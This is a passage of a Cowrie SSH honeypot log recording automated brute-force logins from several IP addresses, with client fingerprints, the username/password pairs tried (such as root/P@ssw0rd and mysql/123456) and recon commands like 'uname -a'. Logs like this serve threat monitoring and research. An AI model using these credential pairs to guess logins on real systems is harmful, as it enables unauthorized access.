cdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:43.071435Z","src_ip":"212.227.125.160","session":"fb10ff64e156"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44006,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b75ae45c141","protocol":"ssh","message":"New connection: 212.227.235.229:44006 (1.2.3.4:22) [session: 3b75ae45c141]","sensor":"my-vps","timestamp":"2025-08-31T02:51:47.509806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:47.510806Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:47.756886Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:51:48.496412Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:51:49.448300Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.449151Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44712,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e4af364fcbd","protocol":"ssh","message":"New connection: 41.226.27.251:44712 (1.2.3.4:22) [session: 3e4af364fcbd]","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.451072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.493687Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.531420Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.667231Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.696367Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.697463Z","src_ip":"212.227.235.229","session":"3b75ae45c141"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:51:49.771440Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.772355Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.816179Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:49.817176Z","src_ip":"41.226.27.251","session":"3e4af364fcbd"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:52.630184Z","src_ip":"212.227.125.160","session":"fb10ff64e156"}
{"eventid":"cowrie.session.closed","duration":"19.8","message":"Connection lost after 19.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:54.532912Z","src_ip":"212.227.125.160","session":"fb10ff64e156"}
{"eventid":"cowrie.login.success","username":"root","password":"sistema","message":"login attempt [root/sistema] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:51:56.993616Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35108,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e62cc1c0f5a","protocol":"ssh","message":"New connection: 212.227.235.229:35108 (1.2.3.4:22) [session: 5e62cc1c0f5a]","sensor":"my-vps","timestamp":"2025-08-31T02:51:57.877438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:59.241597Z","src_ip":"212.227.235.229","session":"5e62cc1c0f5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:59.242888Z","src_ip":"212.227.235.229","session":"5e62cc1c0f5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:52:01.893828Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T02:52:01.894566Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"3.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:05.434889Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.session.closed","duration":"24.5","message":"Connection lost after 24.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:05.436054Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40388,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9e4e6adec0","protocol":"ssh","message":"New connection: 41.226.27.251:40388 (1.2.3.4:22) [session: ff9e4e6adec0]","sensor":"my-vps","timestamp":"2025-08-31T02:52:10.033710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:10.034619Z","src_ip":"41.226.27.251","session":"ff9e4e6adec0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:52:10.078250Z","src_ip":"41.226.27.251","session":"ff9e4e6adec0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:10.211048Z","src_ip":"41.226.27.251","session":"ff9e4e6adec0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:11.510830Z","src_ip":"41.226.27.251","session":"ff9e4e6adec0"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:11.699546Z","src_ip":"212.227.235.229","session":"5e62cc1c0f5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40694,"dst_ip":"1.2.3.4","dst_port":22,"session":"54733309fe31","protocol":"ssh","message":"New connection: 212.227.125.160:40694 (1.2.3.4:22) [session: 54733309fe31]","sensor":"my-vps","timestamp":"2025-08-31T02:52:14.425570Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47328,"dst_ip":"1.2.3.4","dst_port":22,"session":"4711aeef4842","protocol":"ssh","message":"New connection: 212.227.235.229:47328 (1.2.3.4:22) [session: 4711aeef4842]","sensor":"my-vps","timestamp":"2025-08-31T02:52:17.124101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:17.836857Z","src_ip":"212.227.235.229","session":"4711aeef4842"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:52:17.837639Z","src_ip":"212.227.235.229","session":"4711aeef4842"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.212","src_port":38112,"dst_ip":"1.2.3.4","dst_port":22,"session":"70022c596a2d","protocol":"ssh","message":"New connection: 154.209.4.212:38112 (1.2.3.4:22) [session: 70022c596a2d]","sensor":"my-vps","timestamp":"2025-08-31T02:52:19.282297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:19.283021Z","src_ip":"154.209.4.212","session":"70022c596a2d"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"P@ssw0rd123","message":"login attempt [ftptest/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:23.771212Z","src_ip":"212.227.235.229","session":"4711aeef4842"}
{"eventid":"cowrie.session.closed","duration":"27.7","message":"Connection lost after 27.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:25.551006Z","src_ip":"212.227.235.229","session":"5e62cc1c0f5a"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:25.723042Z","src_ip":"212.227.235.229","session":"4711aeef4842"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:28.853820Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:52:28.854650Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57876,"dst_ip":"1.2.3.4","dst_port":22,"session":"814eafafa6a3","protocol":"ssh","message":"New connection: 212.227.235.229:57876 (1.2.3.4:22) [session: 814eafafa6a3]","sensor":"my-vps","timestamp":"2025-08-31T02:52:28.900078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:28.901068Z","src_ip":"212.227.235.229","session":"814eafafa6a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:52:29.154365Z","src_ip":"212.227.235.229","session":"814eafafa6a3"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:29.916624Z","src_ip":"212.227.235.229","session":"814eafafa6a3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":58390,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb5859287544","protocol":"ssh","message":"New connection: 41.226.27.251:58390 (1.2.3.4:22) [session: fb5859287544]","sensor":"my-vps","timestamp":"2025-08-31T02:52:30.494802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:30.495758Z","src_ip":"41.226.27.251","session":"fb5859287544"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:52:30.541391Z","src_ip":"41.226.27.251","session":"fb5859287544"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:30.678517Z","src_ip":"41.226.27.251","session":"fb5859287544"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:31.171869Z","src_ip":"212.227.235.229","session":"814eafafa6a3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:31.946796Z","src_ip":"41.226.27.251","session":"fb5859287544"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38062,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa9d4e882d64","protocol":"ssh","message":"New connection: 212.227.125.160:38062 (1.2.3.4:22) [session: fa9d4e882d64]","sensor":"my-vps","timestamp":"2025-08-31T02:52:38.803279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:39.404901Z","src_ip":"212.227.125.160","session":"fa9d4e882d64"}
